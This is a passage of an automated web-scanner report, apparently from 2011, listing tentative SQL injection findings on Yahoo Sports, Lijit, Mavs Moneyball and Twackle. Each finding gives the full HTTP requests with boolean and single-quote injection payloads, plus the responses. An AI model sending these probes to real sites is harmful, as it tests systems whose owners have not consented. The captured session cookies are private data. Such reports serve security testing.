The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /nba'%20and%201%3d1--%20/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3530

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+39+and+1+news+slug+aw+wojnarowski'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.
...[SNIP]...

Request 2

GET /nba'%20and%201%3d2--%20/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r2.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3520

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+39+and+1+2+news+slug+aw'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.rd.yahoo.c
...[SNIP]...

1.5. http://sports.yahoo.com/nba/news [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sports.yahoo.com
Path:	/nba/news

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19672091'%20or%201%3d1--%20 and 19672091'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /nba/news19672091'%20or%201%3d1--%20?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r3.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3537

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+news19672091+39+or+1+slug+aw+wojnarowski'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.
...[SNIP]...

Request 2

GET /nba/news19672091'%20or%201%3d2--%20?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3527

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+news19672091+39+or+1+2+slug+aw'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.rd.yahoo.c
...[SNIP]...

1.6. http://www.lijit.com/beacon [informer parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.lijit.com
Path:	/beacon

Issue detail

The informer parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the informer parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /beacon?viewId=1307962923471503c3265a8b0&rand=1307962923471&uri=http://www.lijit.com/users/sbnation&informer=7182163%20and%201%3d1--%20&type=fpads&loc=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&rr=&ifr=0&v=1.0&csync=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_csync=dotomi%2Crtb_turn%2C1; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE

Response 1

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:15:18 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n23 ( iad-agg-n7), ms iad-agg-n7 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 13 Jun 2011 11:15:18 GMT
Content-Length: 69
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: tpro_inst=bc491fffd0d2d852ccd68e7be9624b6b; expires=Tue, 12-Jun-2012 11:15:18 GMT; path=/; domain=.lijit.com
Set-Cookie: tpro=eJxlUV1vhCAQ%2FC%2F7TAyIH6d%2Fo49NQyiikiAY0Esuxv%2FeBdO7a%2Fo2s84OM%2BsBa%2FCjsRr6AybtBh0SWmSa0KKtCYz6l5X1SUBOWcsFK3FGgCFqL3QTvEo6zgjwWlRdInVFoKZitXtMlCWPIFU2UXJX0KNajkHIJbvIaKTLaDZxzcBvc4pFcVPNxg5Bu7TtfDLsGgIPnb1phQrjlF%2ByOxWc5jGW4FQ0mXAkDRWMXqzF2PSVruTpDW%2Btvlo673Lzir%2BNsROaTEEOIqo5v1CeuBfNlnJ8HhlBDx%2BrD1sE7LRhS07brim7sjnJUzFKF82ghwIz%2F9HxpmZvukXe44JZHt%2FS2v%2Filt3Or%2Bed8PdtJp3g9ZXA4geh%2FO5wCbvcdYjG4xWBFRTO8wer25Ny; expires=Tue, 12-Jun-2012 11:15:18 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; expires=Wed, 12-Jun-2013 11:15:18 GMT; path=/; domain=.lijit.com

<html>
   <head><title></title></head>
   <body>
           </body>
</html>

Request 2

GET /beacon?viewId=1307962923471503c3265a8b0&rand=1307962923471&uri=http://www.lijit.com/users/sbnation&informer=7182163%20and%201%3d2--%20&type=fpads&loc=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&rr=&ifr=0&v=1.0&csync=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_csync=dotomi%2Crtb_turn%2C1; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE

Response 2

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:15:19 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n23 ( iad-agg-n18), ms iad-agg-n18 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 13 Jun 2011 11:15:19 GMT
Content-Length: 69
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: tpro_inst=deleted; expires=Sun, 13-Jun-2010 11:15:18 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; expires=Wed, 12-Jun-2013 11:15:19 GMT; path=/; domain=.lijit.com

<html>
   <head><title></title></head>
   <body>
           </body>
</html>

1.7. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship HTTP/1.1
Host: www.mavsmoneyball.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:07:49 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Mon, 13 Jun 2011 11:06:10 GMT
ETag: "5e0038-1efa84-4a595e82904b4"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2030212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=15974520"></script>

<link href="http://cdn0.sbnation.com/stylesheets/universal_screen.v5273bb74a0e39148.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/community_new_all.v75f885872ba0b098.css" media="all" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/blogs/blog-print.v777cf8a.css" media="print" rel="stylesheet" type="text/css" />





<style type="text/css"><!-- body{background-image:url(http://cdn1.sbnation.com/community_logos/28080/top_fade_base.png);}.ut-logged-out ul li.start a{background-image:url(http://cdn1.sbnation.com/community_logos/1814/mavs-fave.gif);}.nav-head li a:hover{background-color:#046AB4;}.social-promo{border-color:#046AB4;}.container{background-color:#061922;}.pane h3,.entries h3.subtitle{background-color:#046AB4;border-color:#046AB4;}.nav-head-div{background-color:#023672;}.gcolumns .col-side #thumbs a:hover img{border-color:#285487;}.col-side .sports_data_widget .pane-tabs li{background-color:#2A80BF;}.events,#modal_container .sports_data_widget,.col-side .sports_data_widget,.col-side .sports_data_widget .pane-tabs li a.active,.col-side .sports_data_widget .pane-tabs li a.active:visited,.col-side .sports_data_widget .pane-tabs li a.active:hover,.col-side .sports_data_widget .pane-tabs li a.active:active{background-colo
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:07:50 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Mon, 13 Jun 2011 11:02:12 GMT
ETag: "780110-1efa7a-4a595d9fa8b2a"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2030202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=61256780"></script>

<link href="http://cdn0.sbnation.com/stylesheets/universal_screen.v5273bb74a0e39148.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/community_new_all.v75f885872ba0b098.css" media="all" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/blogs/blog-print.v777cf8a.css" media="print" rel="stylesheet" type="text/css" />





<style type="text/css"><!-- body{background-image:url(http://cdn1.sbnation.com/community_logos/28080/top_fade_base.png);}.ut-logged-out ul li.start a{background-image:url(http://cdn1.sbnation.com/community_logos/1814/mavs-fave.gif);}.nav-head li a:hover{background-color:#046AB4;}.social-promo{border-color:#046AB4;}.container{background-color:#061922;}.pane h3,.entries h3.subtitle{background-color:#046AB4;border-color:#046AB4;}.nav-head-div{background-color:#023672;}.gcolumns .col-side #thumbs a:hover img{border-color:#285487;}.col-side .sports_data_widget .pane-tabs li{background-color:#2A80BF;}.events,#modal_container .sports_data_widget,.col-side .sports_data_widget,.col-side .sports_data_widget .pane-tabs li a.active,.col-side .sports_data_widget .pane-tabs li a.active:visited,.col-side .sports_data_widget .pane-tabs li a.active:hover,.col-side .sports_data_widget .pane-tabs li a.active:active{background-colo
...[SNIP]...

1.8. http://www.twackle.com/fansided/General_Twackle_Widget [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.twackle.com
Path:	/fansided/General_Twackle_Widget

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /fansided'/General_Twackle_Widget HTTP/1.1
Host: www.twackle.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Age: 0
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 13 Jun 2011 11:17:33 GMT
P3P: CP="CAO PSA OUR"
Server: nginx/1.0.2 + Phusion Passenger 3.0.7 (mod_rails/mod_rack)
Status: 500
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.7
X-Varnish: 1493755781
Content-Length: 1735
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US">
<head>
<meta h
...[SNIP]...

Request 2

GET /fansided''/General_Twackle_Widget HTTP/1.1
Host: www.twackle.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Age: 0
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 13 Jun 2011 11:17:34 GMT
ETag: "d82f7b24bfcc87abc64d202c70fedce5"
P3P: CP="CAO PSA OUR"
Server: nginx/1.0.2 + Phusion Passenger 3.0.7 (mod_rails/mod_rack)
Status: 200
Vary: Accept-Encoding
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.7
X-Runtime: 16
X-Varnish: 1493755835
Content-Length: 42
Connection: keep-alive

